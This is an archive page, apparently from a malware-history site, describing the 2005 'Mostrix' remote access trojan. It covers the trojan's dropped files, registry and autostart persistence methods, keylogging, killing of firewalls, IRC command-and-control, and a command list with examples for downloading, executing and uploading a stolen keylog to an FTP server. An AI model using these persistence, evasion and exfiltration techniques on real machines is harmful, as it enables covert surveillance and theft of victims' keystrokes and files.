.: Mostrix :.
Released 16 years, 4 months ago. Jun 2005By DiA
- Coded by: DiA
- Version: Mostrix
- Released date: Jun 2005, 16 years, 4 months ago.
- Family: Mostrix
- Category: Remote Access
Server: dropped files: c:\WINDOWS\MStr.exe Size: 10,240 bytes c:\WINDOWS\mslog\070206.sys Size: 127 bytes startup: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix" data: C:\WINDOWS\MStr.exe attempts to connect to an IRC Server tested on Windows XP February 07, 2006
features: - install itself into system with 4 methods: > first try to copy to windows folder and do autostart registry entry > if Mostrix can't write to registry it edit win.ini in windows folder > if Mostrix can't write to windows directory it try's to copy itself to startup folder > if it can't copy to startup folder, it edit's autoexec.bat in C:\ - log every key event and foreground windows and save all log's under current date .sys in windows directory under subdir "mslog" - kill some favorite firewalls and internet security suites - connect to irc.freenode.net and accept private commands in chan "mostrix" - reconnect every half hour commands: - every command is only accepted at privat chat! systeminfo 'temporary file path' ae: systeminfo 'C:\info.txt' > this command get some info about infected system and save it in a temporary file... dirlist 'directory to list' 'temporary file path' ae: dirlist 'C:\' 'C:\C_drive_dirs.txt' > this command list all sub directorys in a temporary file... filelist 'directory to list' 'temporary file path' ae: filelist 'C:\' 'C:\C_drive_files.txt' > this command list all files in one directory and save it in a temporary file... delete 'file to delete' ae: delete 'C:\C_drive_files.txt' > this command delete's a file, just use it to remove your temporary files... execute 'application to execute' ae: execute 'C:\Windows\Notepad.exe' > this command executes a application, maybe one you downloaded to the infected computer... download 'http:// url file to download' 'save path' ae: download '--/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--' 'C:\nice.exe' > download's a file via http protocol to local infected computer... upload 'file to upload' 'ftp server' 'user' 'password' ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap' > this command upload's a local file of infected computer to your ftp server, name at ftp server is the same on disk... steal a log: Let's say you want a keylog from the 7. June 2005, just do so (imaging "Windows" is the windows directory): upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass' DiA
URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at email@example.com, thank you in advance.